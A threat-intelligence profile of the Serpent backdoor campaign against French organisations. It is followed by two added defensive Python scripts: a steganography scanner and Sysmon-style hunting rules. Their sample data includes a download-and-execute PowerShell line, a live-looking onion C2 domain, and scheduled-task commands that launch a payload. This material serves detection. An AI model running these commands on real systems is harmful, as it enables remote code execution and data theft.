Cyber Incident Victim: Montpellier
Date: Mar 2022
Location: France
Summary
A targeted campaign against French entities in the construction, real estate, and government sectors used a GDPR-themed lure delivered in macro-enabled Word documents. The attack chain pulled steganographic images from a compromised Jamaican credit union site to obtain malicious scripts, used the Chocolatey package manager to install Python and the PySocks library, and then deployed the Serpent backdoor. Serpent reached its command-and-control servers through Tor proxy infrastructure, executed remote commands, and exfiltrated their output through the Termbin pastebin service. The attackers also used a novel evasion technique in which a scheduled task launched a payload as a child process of a legitimate Windows binary. The campaign combined the first malicious use of Chocolatey that Proofpoint had observed, steganography for payload delivery, and infrastructure masquerading. While the objectives remained unclear, a compromise could enable data theft, host control, or delivery of additional payloads. Proofpoint did not attribute the activity to any known threat actor.
| CIA Posture | Motives | Tactics, Techniques & Procedures |
|---|---|---|
| Available to members | 3 motives | 2 techniques |
| Threat Actors | Type | Location |
|---|---|---|
| 0 actors | Available to members | Available to members |
Description
In early March 2022, Proofpoint researchers identified a targeted campaign against French organizations in the construction, real estate, and government sectors in Montpellier, Occitanie. The threat actor used a multi-stage infection chain that began with phishing emails carrying French-language lures themed as job applications and GDPR compliance documents. One observed message came from "Jeanne Vrakele" at a Gmail address with the subject line "Candidature - Jeanne Vrakele." The attached macro-enabled Microsoft Word document claimed to contain GDPR information; once the recipient enabled macros, its Visual Basic for Applications (VBA) code ran. The macro retrieved an image from a compromised Jamaican credit union website (fhccu[.]com) that looked like a cartoon illustration but concealed a base64-encoded PowerShell script. That script downloaded and installed the Chocolatey package manager, a legitimate open-source Windows software automation tool that Proofpoint had not previously seen in a malicious campaign, and used it to install Python and the PySocks proxy library.
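The page says the image carried a base64-encoded PowerShell script but does not say how the script was hidden. The block below is an added example, not Proofpoint's or the actor's code, and it assumes the simplest form of this trick: the text is appended after the JPEG end-of-image marker (FF D9) or the PNG IEND chunk, where image viewers ignore it. The sample image bytes, the script text and the keyword list are constructed for the example.

```python
"""Pull a base64 script appended after an image's end-of-image marker (added example)."""
from __future__ import annotations

import base64
import re

JPEG_SOI = b"\xff\xd8"
JPEG_EOI = b"\xff\xd9"
PNG_SIG = b"\x89PNG\r\n\x1a\n"
PNG_IEND = b"\x00\x00\x00\x00IEND\xae\x42\x60\x82"

# Assumed keyword list: strings that make a decoded trailer worth a human look.
PS_HINTS = ("iex", "invoke-expression", "downloadstring", "net.webclient",
            "frombase64string", "choco", "-encodedcommand")


def trailing_bytes(data: bytes) -> bytes | None:
    """Return the bytes after the last EOI/IEND marker, or None for a non-image or a clean image.

    rfind is used because EXIF thumbnails embed a second JPEG with its own EOI; a base64
    trailer can never contain FF D9, so the last marker is the real end of the picture.
    """
    if data.startswith(JPEG_SOI):
        marker = JPEG_EOI
    elif data.startswith(PNG_SIG):
        marker = PNG_IEND
    else:
        return None
    end = data.rfind(marker)
    if end == -1:
        return None
    trailer = data[end + len(marker):].strip()
    return trailer or None


def decode_trailer(trailer: bytes) -> str | None:
    """Decode a clean base64 trailer to text; None if it is not base64 or not text."""
    compact = re.sub(rb"\s+", b"", trailer)
    if len(compact) % 4 or not re.fullmatch(rb"[A-Za-z0-9+/]+=*", compact):
        return None
    try:
        raw = base64.b64decode(compact, validate=True)
    except ValueError:
        return None
    # Scripts meant for powershell -EncodedCommand are UTF-16LE (every odd byte is 0 for ASCII).
    if len(raw) >= 2 and raw[1::2].count(0) > len(raw) // 4:
        try:
            return raw.decode("utf-16-le")
        except UnicodeDecodeError:
            pass
    try:
        return raw.decode("utf-8")
    except UnicodeDecodeError:
        return None


def scan_image(data: bytes) -> dict | None:
    """Return {'script': text, 'hints': [...]} when the image hides a decodable script, else None."""
    trailer = trailing_bytes(data)
    if trailer is None:
        return None
    script = decode_trailer(trailer)
    if script is None:
        return None
    lowered = script.lower()
    return {"script": script, "hints": [h for h in PS_HINTS if h in lowered]}


# Constructed sample: a JPEG skeleton (not a real picture) with a stage-one style script appended.
SAMPLE_SCRIPT = ("IEX (New-Object Net.WebClient).DownloadString('https://example.invalid/install.ps1'); "
                 "choco install python -y")
_SKELETON = JPEG_SOI + b"\xff\xe0\x00\x10JFIF\x00" + b"\x00" * 32 + JPEG_EOI
STEGO_JPEG = _SKELETON + b"\n" + base64.b64encode(SAMPLE_SCRIPT.encode())
CLEAN_JPEG = _SKELETON

if __name__ == "__main__":
    print(scan_image(STEGO_JPEG))
    print(scan_image(CLEAN_JPEG))
```

Run this over every image fetched by an Office process or a script host in a proxy cache; a picture with a base64 trailer that decodes to text containing download-and-execute keywords is the stage-one indicator this chain leaves behind.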

The initial PowerShell script then fetched a second steganographic image from the same Jamaican domain and extracted a base64-encoded Python backdoor, which researchers named "Serpent." The malware wrote itself to disk as MicrosoftSecurityUpdate.py and was launched through a batch file. Serpent reached its command-and-control (C2) infrastructure through two Tor proxy domains under .onion[.]pet, a gateway that exposes Tor hidden services over ordinary HTTP so the victim needs no Tor client; one such URL was mhocujuh3h6fek7k4efpxo5teyigezqkpixkbvc2mzaaprmusze6icqd[.]onion[.]pet. The backdoor polled an "order" server every 10 seconds and parsed the response as "<random integer>--<hostname>--<command>." Only when the hostname matched the infected machine did it run the Windows command, post the output to the Termbin pastebin service over SOCKS5 proxies (the capability the PySocks dependency provides), and report to a separate "answer" server with the host identifier and the Termbin URL carried in HTTP headers.

Proofpoint also documented an ancillary payload-delivery technique built on the Windows Task Scheduler: a task created with schtasks.exe was set to trigger on a custom event ID (777), so raising that dummy event launched an arbitrary binary as a child process of the legitimate Windows binary taskhostw.exe, a parent-child relationship that had not previously been documented as an evasion method. The campaign's objectives remained unclear, but a compromised host was exposed to remote administration, data exfiltration, and secondary payload deployment. Proofpoint mitigated the threat with Emerging Threats (ET) signatures covering Chocolatey-related network traffic (2035303, 2035306) and the malicious script retrieval (2851286), and credited the discovery to machine-learning-assisted campaign clustering in its internal "Camp Disco" analysis tool.
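The following is an added detection example, not Proofpoint's code or its ET signatures. It runs the chain's host and DNS indicators from the description above over constructed Sysmon-style events (process creation and DNS query fields): Office spawning PowerShell, the Chocolatey bootstrap and choco install python, python.exe executing MicrosoftSecurityUpdate.py from a user-writable path, lookups of .onion.pet and termbin.com, a scheduled task registered to fire on event ID 777, and a non-Windows binary spawned by taskhostw.exe. The field names, rule ids, sample paths and user name are this example's assumptions; eventcreate.exe is assumed as the tool that raised the dummy event, which the page does not name.

```python
"""Hunt for the Serpent chain in Sysmon-style process and DNS events (added example)."""
from __future__ import annotations

import re
from typing import Callable

OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
C2_SUFFIXES = (".onion.pet", ".termbin.com")  # Tor gateway used for C2, pastebin used for output
USER_DIR_PY = re.compile(r"\\(?:temp|appdata|users)\\[^\s\"]*\.py\b", re.I)
ONEVENT = re.compile(r"/sc\s+onevent\b", re.I)
EVENT_777 = re.compile(r"EventID\s*=\s*777\b|/id\s+777\b", re.I)


def base(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def r_office_spawn(e: dict) -> bool:
    # A macro-enabled document handing off to a script host.
    return e["type"] == "process" and base(e["parent"]) in OFFICE and base(e["image"]) in SCRIPT_HOSTS


def r_chocolatey(e: dict) -> bool:
    # PowerShell fetching the Chocolatey bootstrap, or choco pulling in the Python toolchain.
    if e["type"] != "process":
        return False
    img, cmd = base(e["image"]), e["cmd"].lower()
    if img in {"powershell.exe", "pwsh.exe"} and "chocolatey" in cmd:
        return True
    return img == "choco.exe" and re.search(r"\binstall\s+(python|pysocks|pip)\b", cmd) is not None


def r_python_backdoor(e: dict) -> bool:
    # python.exe running the dropped file name, or any .py from a user-writable path under cmd.exe.
    if e["type"] != "process" or base(e["image"]) not in {"python.exe", "pythonw.exe"}:
        return False
    cmd = e["cmd"]
    return ("microsoftsecurityupdate.py" in cmd.lower()
            or (base(e["parent"]) == "cmd.exe" and USER_DIR_PY.search(cmd) is not None))


def r_c2_domain(e: dict) -> bool:
    q = e.get("query", "").lower().rstrip(".")
    return e["type"] == "dns" and any(q == s[1:] or q.endswith(s) for s in C2_SUFFIXES)


def r_event_triggered_task(e: dict) -> bool:
    # A task registered to fire on the custom event, or that event being raised (eventcreate.exe assumed).
    if e["type"] != "process":
        return False
    img, cmd = base(e["image"]), e["cmd"]
    if img == "schtasks.exe" and ONEVENT.search(cmd) and EVENT_777.search(cmd):
        return True
    return img == "eventcreate.exe" and EVENT_777.search(cmd) is not None


def r_taskhost_child(e: dict) -> bool:
    # taskhostw.exe hosts DLL-based tasks and rarely spawns executables, least of all from user paths.
    return (e["type"] == "process" and base(e["parent"]) == "taskhostw.exe"
            and not e["image"].lower().startswith("c:\\windows\\"))


RULES: list[tuple[str, Callable[[dict], bool]]] = [
    ("office-spawn", r_office_spawn),
    ("chocolatey-bootstrap", r_chocolatey),
    ("python-backdoor", r_python_backdoor),
    ("c2-domain", r_c2_domain),
    ("event-triggered-task", r_event_triggered_task),
    ("taskhost-child", r_taskhost_child),
]


def detect(events: list[dict]) -> list[tuple[int, str]]:
    """Return (event index, rule id) for every rule that matches an event."""
    return [(i, rid) for i, e in enumerate(events) for rid, rule in RULES if rule(e)]


# Constructed events mimicking Sysmon EID 1 (process) and EID 22 (dns) fields; paths and user are invented.
U = "C:\\Users\\jdupont\\AppData\\Local\\Temp"
PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
CMD = "C:\\Windows\\System32\\cmd.exe"
SAMPLE_EVENTS = [
    {"type": "process", "image": PS, "parent": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE",
     "cmd": "powershell -ep bypass -c \"iex ((New-Object Net.WebClient).DownloadString('https://community.chocolatey.org/install.ps1'))\""},
    {"type": "process", "image": "C:\\ProgramData\\chocolatey\\choco.exe", "parent": PS, "cmd": "choco install python -y"},
    {"type": "process", "image": "C:\\Python310\\python.exe", "parent": CMD,
     "cmd": f"C:\\Python310\\python.exe {U}\\MicrosoftSecurityUpdate.py"},
    {"type": "dns", "image": "C:\\Python310\\python.exe",
     "query": "mhocujuh3h6fek7k4efpxo5teyigezqkpixkbvc2mzaaprmusze6icqd.onion.pet"},
    {"type": "dns", "image": "C:\\Python310\\python.exe", "query": "termbin.com"},
    {"type": "process", "image": "C:\\Windows\\System32\\schtasks.exe", "parent": CMD,
     "cmd": f"schtasks /create /tn Update /tr {U}\\payload.exe /sc onevent /ec Application /mo *[System/EventID=777]"},
    {"type": "process", "image": "C:\\Windows\\System32\\eventcreate.exe", "parent": CMD,
     "cmd": "eventcreate /id 777 /t information /l application /so Update /d ok"},
    {"type": "process", "image": f"{U}\\payload.exe", "parent": "C:\\Windows\\System32\\taskhostw.exe", "cmd": f"{U}\\payload.exe"},
    # Benign noise: a developer's script started from Explorer, and an ordinary browser lookup.
    {"type": "process", "image": "C:\\Program Files\\Python311\\python.exe", "parent": "C:\\Windows\\explorer.exe",
     "cmd": "\"C:\\Program Files\\Python311\\python.exe\" C:\\dev\\app.py"},
    {"type": "dns", "image": "C:\\Program Files\\Mozilla Firefox\\firefox.exe", "query": "www.proofpoint.com"},
]

if __name__ == "__main__":
    for idx, rule_id in detect(SAMPLE_EVENTS):
        print(f"event {idx}: {rule_id}")
```

Event-triggered tasks and taskhostw.exe children do occur in legitimate environments, so baseline those two rules before paging on them; the strong signal is several of these rules firing on one host within minutes, in the order the chain executes them.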
